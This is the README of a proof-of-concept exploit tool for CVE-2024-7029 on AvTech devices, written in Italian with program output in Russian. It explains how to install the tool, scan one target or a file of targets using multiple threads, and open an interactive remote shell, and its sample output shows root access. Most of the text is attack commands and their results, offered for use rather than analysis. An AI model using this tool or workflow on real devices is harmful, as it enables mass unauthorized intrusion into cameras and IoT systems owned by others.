
Un exploit PoC per la vulnerabilità CVE-2024-7029 trovata nei dispositivi AvTech, che consente l'esecuzione di codice remoto (RCE)
GenAvTechRCEExploit Un exploit PoC per la vulnerabilità CVE-2024-7029 riscontrata nei dispositivi AvTech, che consente l'esecuzione remota di codice (RCE). Questo strumento può scansionare i dispositivi vulnerabili ed eseguire comandi su di essi in modo interattivo.
requestsprompt_toolkitalive_progressInstalla le librerie richieste con:
pip install -r requirements.txt
Per verificare la vulnerabilità di un singolo target e avviare una shell interattiva:
python3 GenAvTechRCEExploit.py -u <target_url>
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100
[*] Выполняется проверка уязвимости цели...
[+] Обнаружена уязвимость на цели: http://192.168.1.100
[*] Запуск интерактивной оболочки...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Завершение интерактивной оболочки
Sostituisci <target_url> con l'URL effettivo del dispositivo target.
Per scansionare più target forniti in un file (un URL per riga):
python3 GenAvTechRCEExploit.py -f <file_path>
$ python3 GenAvTechRCEExploit.py -f targets.txt
Scanning Targets |████████████████████████████████████████| 100%
[+] Обнаружена уязвимость на цели: http://192.168.1.50
[+] Обнаружена уязвимость на цели: http://192.168.1.150
[-] Цель http://192.168.1.200 не уязвима
Sostituisci <file_path> con il percorso del file contenente gli URL dei target.
Puoi specificare il numero di thread per la scansione con l'opzione -t:
python3 GenAvTechRCEExploit.py -f <file_path> -t <number_of_threads>
Per impostazione predefinita, il numero di thread è impostato a 10.
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20